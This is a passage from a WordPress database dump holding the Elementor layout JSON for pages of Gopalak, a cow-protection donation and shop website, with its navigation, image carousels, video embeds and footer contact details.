source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by\\u00a0<a href=\\\"https:\\/\\/themehunk.com\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Themehunk<\\/a><\\/span><\\/p>\",\"align\":\"center\",\"text_color\":\"#020202\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12345,2023,'_elementor_page_assets','a:0:{}'),(12347,2024,'_elementor_edit_mode','builder'),(12348,2024,'_elementor_template_type','wp-page'),(12349,2024,'_elementor_version','3.7.8'),(12350,2024,'_wp_page_template','elementor_canvas'),(12351,2024,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s 